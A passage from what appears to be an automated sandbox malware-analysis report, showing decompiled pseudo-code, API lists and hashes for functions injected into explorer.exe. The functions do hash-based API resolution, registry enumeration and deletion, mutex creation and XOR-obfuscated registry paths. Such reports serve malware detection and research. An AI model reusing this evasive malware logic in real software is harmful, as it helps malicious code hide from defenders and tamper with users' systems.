				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E000C8604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E000C8604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0xde68c; // 0x280fab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E000C861A( &_v32, 0x3fff);
					E000C861A( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0xde68c; // 0x280fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0xde68c; // 0x280fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0xde690; // 0x280fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0xde68c; // 0x280fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E000CC392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E000CB1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0xde68c; // 0x280fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































        0x000c61b4
        0x000c61b4
        0x000c61c0
        0x000c61cf
        0x000c61d2
        0x000c61dc
        0x000c61e4
        0x000c61e7
        0x000c61ef
        0x000c61f1
        0x000c61f4
        0x000c61f9
        0x000c6365
        0x000c6369
        0x000c6369
        0x000c6209
        0x000c620b
        0x000c6211
        0x00000000
        0x00000000
        0x000c6234
        0x000c6333
        0x000c6337
        0x000c6339
        0x000c6341
        0x000c6341
        0x000c634d
        0x000c635b
        0x00000000
        0x000c6360
        0x000c623d
        0x000c6241
        0x000c6245
        0x000c6249
        0x000c624d
        0x000c624e
        0x000c624f
        0x000c6250
        0x000c6251
        0x000c6255
        0x000c625c
        0x000c625d
        0x000c6262
        0x000c626d
        0x000c6282
        0x000c6284
        0x00000000
        0x00000000
        0x000c628a
        0x000c628d
        0x000c6295
        0x000c62a2
        0x000c62a7
        0x000c62aa
        0x000c62b3
        0x000c62ba
        0x000c62ca
        0x000c62d4
        0x000c62da
        0x000c62dc
        0x000c62e1
        0x000c62ea
        0x000c62ec
        0x000c62ee
        0x000c62f0
        0x000c62fa
        0x000c6300
        0x000c6304
        0x000c6308
        0x000c630d
        0x000c6313
        0x000c6315
        0x000c6317
        0x000c6317
        0x000c631e
        0x000c631e
        0x000c6304
        0x000c6323
        0x000c6323
        0x000c6326
        0x000c6327
        0x000c632a
        0x000c632a
        0x00000000
        0x000c628d
        0x000c626f
        0x000c6277
        0x00000000

        APIs
        • memset.MSVCRT ref: 000C61D2
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000C622C
        • memset.MSVCRT ref: 000C6295
        • memset.MSVCRT ref: 000C62A2
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: memset$AllocateHeapOpen
        • String ID:
        • API String ID: 2508404634-0
        • Opcode ID: 3d8d8dafa7df1e62804fdd5e4aa686f8d042dc27e0b2e973a6a4529a7a4394ff
        • Instruction ID: f078e681015c4581afc2321a8b200155c778797c9d6990bad354d136111ed3bb
        • Opcode Fuzzy Hash: 3d8d8dafa7df1e62804fdd5e4aa686f8d042dc27e0b2e973a6a4529a7a4394ff
        • Instruction Fuzzy Hash: 33510EB1A00249AFEB61DF94CC85FEE7BBCEF04740F10806AF605AB152DB759A058B65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CDFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 77 cdfad-cdfc4 78 cdfc6-cdfee 77->78 79 ce021 77->79 78->79 81 cdff0-ce013 call cc379 call cd400 78->81 80 ce023-ce027 79->80 86 ce028-ce03f 81->86 87 ce015-ce01f 81->87 88 ce095-ce097 86->88 89 ce041-ce049 86->89 87->79 87->81 88->80 89->88 90 ce04b 89->90 91 ce04d-ce053 90->91 92 ce055-ce057 91->92 93 ce063-ce074 91->93 92->93 94 ce059-ce061 92->94 95 ce079-ce085 LoadLibraryA 93->95 96 ce076-ce077 93->96 94->91 94->93 95->79 97 ce087-ce091 GetProcAddress 95->97 96->95 97->79 98 ce093 97->98 98->80
        C-Code - Quality: 100%
        			E000CDFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E000CD400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000CC379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























        0x000cdfb6
        0x000cdfb8
        0x000cdfbb
        0x000cdfbe
        0x000cdfc4
        0x000ce021
        0x00000000
        0x000ce021
        0x000cdfc6
        0x000cdfd1
        0x000cdfd4
        0x000cdfd9
        0x000cdfde
        0x000cdfe1
        0x000cdfe3
        0x000cdfe6
        0x000cdfe9
        0x000cdfee
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000cdff0
        0x000cdff0
        0x000ce002
        0x000ce00f
        0x000ce013
        0x00000000
        0x00000000
        0x000ce015
        0x000ce018
        0x000ce019
        0x000ce01f
        0x00000000
        0x00000000
        0x00000000
        0x000ce01f
        0x000ce036
        0x000ce03b
        0x000ce03f
        0x00000000
        0x000ce04b
        0x000ce04b
        0x000ce04d
        0x000ce04d
        0x000ce053
        0x00000000
        0x00000000
        0x000ce059
        0x000ce05d
        0x000ce061
        0x00000000
        0x00000000
        0x00000000
        0x000ce061
        0x000ce067
        0x000ce06f
        0x000ce074
        0x000ce077
        0x000ce077
        0x000ce079
        0x000ce07d
        0x000ce085
        0x00000000
        0x00000000
        0x000ce089
        0x000ce091
        0x00000000
        0x00000000
        0x00000000
        0x000ce091

        APIs
        • LoadLibraryA.KERNEL32(.dll), ref: 000CE07D
        • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000CE089
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: .dll
        • API String ID: 2574300362-2738580789
        • Opcode ID: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
        • Instruction ID: 5f9d211447d3819fd503f87bdcf7e534d45c92374d2040a9589af20f045a33b0
        • Opcode Fuzzy Hash: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
        • Instruction Fuzzy Hash: 6D31B231A001959BDB64CFA9C884BAEBBE5AF44304F38446ED905D7352DA74ED81CBE0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CB998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 99 cb998-cb9b8 GetTokenInformation 100 cb9fe 99->100 101 cb9ba-cb9c3 GetLastError 99->101 103 cba00-cba04 100->103 101->100 102 cb9c5-cb9d5 call c8604 101->102 106 cb9db-cb9ee GetTokenInformation 102->106 107 cb9d7-cb9d9 102->107 106->100 108 cb9f0-cb9fc call c861a 106->108 107->103 108->107
        C-Code - Quality: 86%
        			E000CB998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E000C8604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E000C861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










        0x000cb99b
        0x000cb99c
        0x000cb9a3
        0x000cb9ab
        0x000cb9af
        0x000cb9b8
        0x000cb9fe
        0x000cb9fe
        0x000cb9c5
        0x000cb9cd
        0x000cb9cf
        0x000cb9d5
        0x000cb9ee
        0x00000000
        0x000cb9f0
        0x000cb9f5
        0x00000000
        0x000cb9fb
        0x000cb9d7
        0x000cb9d7
        0x000cb9d7
        0x000cb9d7
        0x000cb9d5
        0x000cba04

        APIs
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9B3
        • GetLastError.KERNEL32(?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9BA
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9E9
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: InformationToken$AllocateErrorHeapLast
        • String ID:
        • API String ID: 2499131667-0
        • Opcode ID: 6796c333b43c1c448a21b6fa83f43d0f42b8e702f84117f610061b0c96f96384
        • Instruction ID: d997e41f721a916132a1fdbd49b54382bda47c6799cd78954eaa02ec7e04328f
        • Opcode Fuzzy Hash: 6796c333b43c1c448a21b6fa83f43d0f42b8e702f84117f610061b0c96f96384
        • Instruction Fuzzy Hash: A501A272601118BF9B209BA6DC4AEAF7FECDB457A1B10022AFA05D7111EB30DD0087B0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C590C, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 111 c590c-c5915 112 c591c-c5932 CreateMutexA 111->112 113 c5917-c591a 111->113 115 c593f-c594a GetLastError 112->115 116 c5934-c593d GetLastError 112->116 114 c596e-c5973 113->114 118 c594c-c5958 call ca4bf 115->118 119 c5965-c596b 115->119 117 c596d 116->117 117->114 118->119 122 c595a-c5963 118->122 119->117 122->117
        C-Code - Quality: 100%
        			E000C590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E000CA4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0xde684; // 0x280f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








        0x000c5910
        0x000c5915
        0x000c5921
        0x000c592e
        0x000c5932
        0x000c594a
        0x000c596a
        0x000c596b
        0x000c595a
        0x000c595a
        0x000c5960
        0x000c5960
        0x000c5934
        0x000c5934
        0x000c593a
        0x000c593a
        0x000c5917
        0x000c5917
        0x000c5917
        0x000c5973

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5928
        • GetLastError.KERNEL32(?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5934
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateErrorLastMutex
        • String ID:
        • API String ID: 1925916568-0
        • Opcode ID: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
        • Instruction ID: d073c145edc5ca2aa73541b9c57a8b093e21ae94b269b6476e6d31558b2c847e
        • Opcode Fuzzy Hash: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
        • Instruction Fuzzy Hash: A1F02835601910CBD6A0175ADC84F3E7B98EB95772B51036AF969DB1E1CF34DC4443B1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C9B43, Relevance: 3.3, APIs: 2, Instructions: 254COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 124 c9b43-c9b75 call c8604 127 c9b7e-c9b9e call cb5f6 124->127 128 c9b77-c9b79 124->128 132 c9ba0 127->132 133 c9ba3-c9bb8 call c95c7 127->133 129 c9e1a-c9e1e 128->129 132->133 136 c9cee-c9cfb 133->136 137 c9bbe-c9bd6 133->137 138 c9d3c-c9d4c call c9292 136->138 139 c9cfd-c9d1e 136->139 144 c9bdc-c9bf8 137->144 145 c9ceb 137->145 148 c9d4f-c9d51 138->148 146 c9d54-c9d74 call c85c2 RegOpenKeyExA 139->146 147 c9d20-c9d3a call c9292 139->147 144->146 154 c9bfe-c9c18 call c9292 144->154 145->136 156 c9dc8-c9dcd 146->156 157 c9d76-c9d8b 146->157 147->148 148->146 162 c9d8d-c9db2 call c861a memset call c861a 154->162 163 c9c1e-c9c36 154->163 159 c9dcf 156->159 160 c9dd5 156->160 157->162 165 c9dba-c9dbf 157->165 159->160 164 c9dd8-c9df4 call cc379 160->164 162->165 174 c9c38-c9c7c call c95e1 call c92e5 call c85d5 call c9256 163->174 175 c9cab-c9cb0 163->175 179 c9e0b-c9e18 call c861a 164->179 180 c9df6-c9e09 164->180 170 c9dc1 165->170 171 c9dc3-c9dc6 165->171 170->171 171->164 197 c9c7e-c9c83 174->197 198 c9c8b-c9ca9 call c861a * 2 174->198 182 c9cb6-c9ce9 call c9292 call c861a 175->182 179->129 180->179 180->180 182->146 197->198 199 c9c85 197->199 198->182 199->198
        C-Code - Quality: 89%
        			E000C9B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				int _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				intOrPtr _t110;
				int* _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E000C8604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E000CB5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000C95C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0xde688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E000C9292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0xde68c; // 0x280fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E000C9292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0xde688; // 0xf0000
						_t128 =  *0xde68c; // 0x280fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0xde68c; // 0x280fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000C85C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0xde68c; // 0x280fab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E000CC379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E000C861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t110 =  *0xde68c; // 0x280fab8
							_t111 =  *((intOrPtr*)(_t110 + 0x28))(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E000C861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E000C861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E000C9292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0xde68c; // 0x280fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0xde68c; // 0x280fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000C95E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000C92E5(_v32);
							_v32 = _t179;
							E000C85D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E000C9256(_v12);
							_v24 = _t147;
							_t148 =  *0xde68c; // 0x280fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E000C861A( &_v32, 0xfffffffe);
							E000C861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E000C9292(_v12);
						_t171 =  *0xde684; // 0x280f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E000C861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}




















































        0x000c9b4c
        0x000c9b4e
        0x000c9b51
        0x000c9b53
        0x000c9b5b
        0x000c9b5e
        0x000c9b65
        0x000c9b6d
        0x000c9b6f
        0x000c9b75
        0x000c9b7e
        0x000c9b86
        0x000c9b8c
        0x000c9b93
        0x000c9b99
        0x000c9b9b
        0x000c9b9e
        0x000c9ba0
        0x000c9ba0
        0x000c9ba0
        0x000c9ba8
        0x000c9bab
        0x000c9bb0
        0x000c9bb3
        0x000c9bb6
        0x000c9bb8
        0x000c9cee
        0x000c9cee
        0x000c9cf4
        0x000c9cfb
        0x000c9d3c
        0x000c9d40
        0x000c9d41
        0x000c9d47
        0x000c9d4c
        0x000c9d4f
        0x000c9d4f
        0x000c9d51
        0x00000000
        0x000c9d51
        0x000c9d00
        0x000c9d0a
        0x000c9d13
        0x000c9d18
        0x000c9d1b
        0x000c9d1e
        0x00000000
        0x00000000
        0x000c9d20
        0x000c9d24
        0x000c9d25
        0x000c9d2a
        0x000c9d2b
        0x000c9d2e
        0x000c9d32
        0x000c9d37
        0x00000000
        0x000c9bbe
        0x000c9bbe
        0x000c9bcb
        0x000c9bd1
        0x000c9bd4
        0x000c9bd6
        0x000c9ceb
        0x00000000
        0x000c9ceb
        0x000c9bdf
        0x000c9be3
        0x000c9beb
        0x000c9bf2
        0x000c9bf5
        0x000c9bf8
        0x000c9d54
        0x000c9d57
        0x000c9d6f
        0x000c9d72
        0x000c9d74
        0x000c9dc8
        0x000c9dcb
        0x000c9dcd
        0x000c9dcf
        0x000c9dcf
        0x000c9dd5
        0x000c9dd8
        0x000c9dd8
        0x000c9ddd
        0x000c9de4
        0x000c9dea
        0x000c9def
        0x000c9df2
        0x000c9df4
        0x000c9e0b
        0x000c9e11
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000c9df6
        0x000c9df6
        0x000c9e02
        0x000c9e06
        0x000c9e07
        0x000c9e07
        0x00000000
        0x000c9df6
        0x000c9d79
        0x000c9d7d
        0x000c9d86
        0x000c9d89
        0x000c9d8b
        0x000c9dba
        0x000c9dbd
        0x000c9dbf
        0x000c9dc1
        0x000c9dc1
        0x000c9dc3
        0x00000000
        0x000c9dc3
        0x000c9d8d
        0x000c9d96
        0x000c9da2
        0x000c9dad
        0x00000000
        0x000c9db2
        0x000c9bfe
        0x000c9bff
        0x000c9c02
        0x000c9c07
        0x000c9c0b
        0x000c9c10
        0x000c9c13
        0x000c9c16
        0x000c9c18
        0x00000000
        0x00000000
        0x000c9c29
        0x000c9c31
        0x000c9c34
        0x000c9c36
        0x000c9cab
        0x000c9cb3
        0x000c9c38
        0x000c9c3a
        0x000c9c49
        0x000c9c51
        0x000c9c57
        0x000c9c5a
        0x000c9c62
        0x000c9c65
        0x000c9c6f
        0x000c9c72
        0x000c9c77
        0x000c9c7a
        0x000c9c7c
        0x000c9c7e
        0x000c9c81
        0x000c9c83
        0x000c9c85
        0x000c9c85
        0x000c9c83
        0x000c9c91
        0x000c9c9c
        0x000c9ca1
        0x000c9ca4
        0x000c9ca4
        0x000c9cc3
        0x000c9cc8
        0x000c9cce
        0x000c9cd1
        0x000c9cd3
        0x000c9cd9
        0x000c9ce2
        0x00000000
        0x000c9ce8
        0x000c9bb8
        0x000c9b77
        0x00000000

        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 7cf8feac55d5c6e9e0db613a7901f620fc8ebe02df07073df37a390e1c883798
        • Instruction ID: d99cd1c3d9fcc3767b0c57ffbf3441cc8e1f37364192496a450fb361744b74f1
        • Opcode Fuzzy Hash: 7cf8feac55d5c6e9e0db613a7901f620fc8ebe02df07073df37a390e1c883798
        • Instruction Fuzzy Hash: FB913CB1D00209AFDF10DF95CC89EEEBBB8EF18350F10416AF915AB292D7349A00CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA6A9, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 204 ca6a9-ca6b9 205 ca6bb-ca6bd 204->205 206 ca6c2-ca6cd call ca63b 204->206 207 ca75b-ca75d 205->207 210 ca757 206->210 211 ca6d3-ca6e5 206->211 212 ca759-ca75a 210->212 214 ca73d-ca748 211->214 215 ca6e7-ca6f8 call c8604 211->215 212->207 214->210 220 ca74a-ca756 call c861a 214->220 215->214 219 ca6fa-ca709 215->219 221 ca72d-ca73b ReadFile 219->221 220->210 221->214 223 ca70b-ca70f 221->223 225 ca75e-ca761 223->225 226 ca711-ca72c 223->226 225->214 227 ca763-ca76c 225->227 226->221 228 ca76e 227->228 229 ca770-ca77b CloseHandle 227->229 228->229 229->212
        C-Code - Quality: 27%
        			E000CA6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
